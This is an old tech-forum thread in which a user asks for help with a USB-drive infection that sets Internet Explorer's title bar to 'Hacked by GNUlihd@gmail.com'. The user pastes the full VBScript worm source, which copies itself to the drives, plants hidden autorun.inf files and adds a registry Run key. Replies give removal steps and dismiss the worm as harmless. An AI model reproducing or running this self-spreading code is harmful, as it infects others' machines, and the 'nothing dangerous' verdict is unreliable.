SOS... hacker attack? or Bluff ?

[gsoul2soul]

After using the PENDRIVE at my office... I get this weird thing at HOME!!!

(point to note: "I do check my pendrive with antivirus avast... and i update the virus definition daily)

And the virus software doesn't find anything on it!!!

Now... first of all my pendrive won't open when i double click... if i do it takes time and open in explorer (i can sense something has been started)

Then it's all fine and dandy... until i restart my PC (there's this weird TEXTfile that opens... on it there are some weird things written, more like language of some sort)

Then when i check my service... there is this one thing running "MFC32.DLL.VBS"
(which i can never... find, if it try to DELETE)... when i disable it by "msconfig" the notepad with that thing won't show!!

BUT......

When i open my IE browser on the TITLE bar it's writted Hacked by GNUlihd@gmail.com

HELP.... i'm scared to even log into my email accounts, is anybody logging me? or is it a prank? help

[gxsaurav]

just a script which changed a few things in registry

u need to open the pen drive, try command prompt. U need to check that VBS file, it is not a virus just a prank, or Avast have found a malicious code. That VB script just changed the registry for the IE titlebar text

another option is firefox, open firefox, & type <x>:\ in the address bar where x is the drive letter of your pen drive. then nevigate to the file & read it.

From now on, just to be on safe side. Disable Autoplay for drives

[gsoul2soul]

well... it's something in my PENDRIVE !!! (Im sure... it's still there)

I tried doing like you said... even scaned my pendrive it won't say anything.

I click on my "i drive" that's my pendrive... and suddenly it opens in "Explorer"

and WALLA.... the message "Hacked by GNUlihd@gmail.com" appears on IE title bar

Now... how the F@#K am i to see this file in my pendrive? how ? how?
I'm using Avast antivirus... and i updated my virus defintion before i scaned the pen drive!!!

HELP !!!

[it_waaznt_me]

Start > Run > Cmd {Press Enter}
On the command prompt, type :
I: {Press ENter}

What do you see ?

Say the filename is MFC32.DLL.VBS

So the directory listing should be like :
I:\mfc32.dll.vbs

on the command prompt, type :
mkdir d:\safe

move mfc32.dll.vbs d:\safe\mfc.txt

The file should be moved to D drive with txt extension. You can now delete it safely.

[Edit] You may also use this guide. Provides step by step instructions on how to remove this particular virus.

[gsoul2soul]

Well... i easily deleted "MFC32.DLL.VBS" and "Autorun" (in my pendrive and my C drive) by simply enabling the "View System files" in Folder option.

Anyways... i did open the script file with "notepad" and here's the whole thing:

Is it something dangerous or just that "IE title bar thing?"

******************************

'A mod from nepal V0.04
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MFC32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MFC32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MFC32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MFC32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MFC32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MFC32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MFC32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MS32DLL",winpath&"\MFC32DLL.dll.vb s"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by GNUlihd@gmail.com"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

[it_waaznt_me]

Nothing dangerous, its just changing the title bar of IE and checking and running the script file every hour.

[gtoX]

Anyways, it seems it's nothing harmful, just some kiddie working around with scripts to learn something. I found the fix for the problem in his/her (?) blog itself (http://matrixalaya.blogspot.com/2007...-gnulihd.html).


Have fun fixing the "virus"